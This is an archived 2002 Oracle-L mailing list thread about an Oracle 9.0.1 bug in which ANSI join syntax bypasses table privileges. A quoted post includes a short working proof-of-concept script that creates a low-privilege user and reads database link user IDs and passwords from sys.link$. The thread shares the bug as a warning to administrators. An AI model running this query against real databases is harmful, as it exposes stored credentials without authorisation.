Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: Security Hole

Re: Security Hole

From: Ruth Gramolini <rgramolini_at_tax.state.vt.us>
Date: Tue, 16 Apr 2002 07:23:33 -0800
Message-ID: <F001.0044553B.20020416072333@fatcity.com> 





Thanks! RBG


----- Original Message ----- 


To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>
Sent: Tuesday, April 16, 2002 10:13 AM




> 

> Oracle 9 only.

> Oracle 8 does not support ANSI join syntax.

> 

> Jonathan Lewis

> http://www.jlcomp.demon.co.uk

> 

> Author of:

> Practical Oracle 8i: Building Efficient Databases

> 

> Next Seminar - Australia - July/August

> http://www.jlcomp.demon.co.uk/seminar.html

> 

> Host to The Co-Operative Oracle Users' FAQ

> http://www.jlcomp.demon.co.uk/faq/ind_faq.html

> 

> 

> 

> -----Original Message-----

> To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>

> Date: 16 April 2002 13:47

> 

> 

> |Is this on 9i databases or is 8 involved?  Ruth

> |----- Original Message -----

> |To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>

> |Sent: Tuesday, April 16, 2002 7:33 AM

> |

> |

> |> This just in from comp.databases.oracle.server.

> |>

> |> See metalink bug 2121935.

> |>

> |> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)

> |> allows you to view data from tables on which you have no

> |> privilege.  For example, try this COMPLETE script:

> |>

> |> connect / as sysdba

> |> create user us1 identified by us1;

> |> grant create session to us1;

> |>

> |> connect us1/us1

> |>

> |> select userid, password

> |> from

> |>         sys.link$ cross join dual

> |> ;

> |>

> |>

> |>

> |> Worse still, if you have the privilege to create views

> |> then this loophole allows you to seek and destroy

> |> ANY DATA in the database that you might want to.

> |>

> |> The bug is fixed in 9iR2.  I didn't see any note

> |> about a backport, or a security alert on OTN.

> |>

> |> Conclusion:

> |>

> |>     9.0.1 should not be in use on production system

> |>     until Oracle supplies a fix.

> |>

> 

> 

> 

> -- 

> Please see the official ORACLE-L FAQ: http://www.orafaq.com

> -- 

> Author: Jonathan Lewis

>   INET: jonathan_at_jlcomp.demon.co.uk

> 

> Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> San Diego, California        -- Public Internet access / Mailing Lists

> --------------------------------------------------------------------

> To REMOVE yourself from this mailing list, send an E-Mail message

> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> the message BODY, include a line containing: UNSUB ORACLE-L

> (or the name of mailing list you want to be removed from).  You may

> also send the HELP command for other information (like subscribing).



-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Ruth Gramolini
  INET: rgramolini_at_tax.state.vt.us

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


Received on Tue Apr 16 2002 - 10:23:33 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US